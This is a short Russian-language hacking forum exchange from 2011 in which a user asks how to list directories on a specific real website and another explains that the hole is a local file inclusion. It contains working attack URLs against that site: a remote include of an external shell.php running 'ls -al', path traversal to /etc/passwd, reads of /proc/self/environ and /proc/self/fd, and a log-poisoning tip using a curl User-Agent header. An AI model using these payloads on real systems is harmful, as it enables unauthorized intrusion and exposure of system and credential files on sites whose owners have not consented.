21.10.2011, 19:55
|
|
Участник форума
Регистрация: 05.09.2010
Сообщений: 147
Провел на форуме:
40748
Репутация:
78
|
|
Сообщение от er9j6@
Как на сайте посмотреть содержимое директории?
http://www.enu.dk/index.php?index=http://site.com/shell.php?c=ls%20-al
команда не выполняется
allow_url_fopen - on
http://www.enu.dk/index.php?index=../phpinfo.php
Facepalm.
Это LFI, а не RFI. Local File Include.
http://www.enu.dk/index.php?index=../../../../etc/passwd
Дальше либо чекай /proc/self/environ/
/proc/self/fd/2 (вообще от 1 до 7)
Или ищи access логи. И заходи на страницу с юзерагентом по типу
В курле параметр -H
-H "User-Agent: "
|
|
|